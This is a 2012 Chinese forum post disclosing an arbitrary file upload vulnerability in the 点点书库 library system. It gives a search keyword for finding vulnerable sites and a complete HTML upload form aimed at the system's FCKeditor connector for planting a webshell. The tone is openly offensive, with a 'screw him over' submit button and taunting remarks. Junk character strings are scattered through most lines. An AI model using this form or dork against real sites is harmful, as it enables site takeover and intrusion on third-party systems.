主题:图书馆系统任意文件上传漏洞# q( K# J6 ?2 n( S3 B6 D2 T. i9 S
作者:冰锋刺客$ h, B; X+ h. q# _* Z5 V
厂商:点击书(dianjishu.com)
) t7 I2 Q0 g4 o0 ~ 日期:2012-6-21
1 K0 e$ ]+ j( d8 h7 k6 L% b ) J& e4 \8 q) M8 r$ h) H, W; G
I 概述
% v) |" J. _+ k. N& m6 l$ F/ T 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell$ C+ [# A5 c* U0 O; Q, j; Q2 |4 w
II 简介* M9 C: `! w5 V% |
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"1 z4 _0 i: [$ ?$ A8 [3 `$ c
补充一个漏洞0 Q2 c% @+ c# |8 _. G
<form id="frmUpload" enctype="multipart/form-data"
5 m! b/ P" ]0 \ action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
3 O. h0 ~) @) M( R; Q; q( f) f& r <input id="btnUpload" type="submit" value="操翻他">
/ l3 p6 s* l- j0 k' {; j3 f </form>8 X1 v/ G& ? h, O: W9 ], i7 u7 d
你们懂的
0 y/ r% b5 r: l a6 D 那傻逼提供还需要改包.. G, ]+ a" ]) [; J8 Q n/ B- V
自己看了下源代码发现fckeditor
, ^3 l" X' y" \ 直接秒杀9 h" v+ H9 u" N0 }5 E
|
发表于 2012-9-10 21:20:59
收藏
支持
反对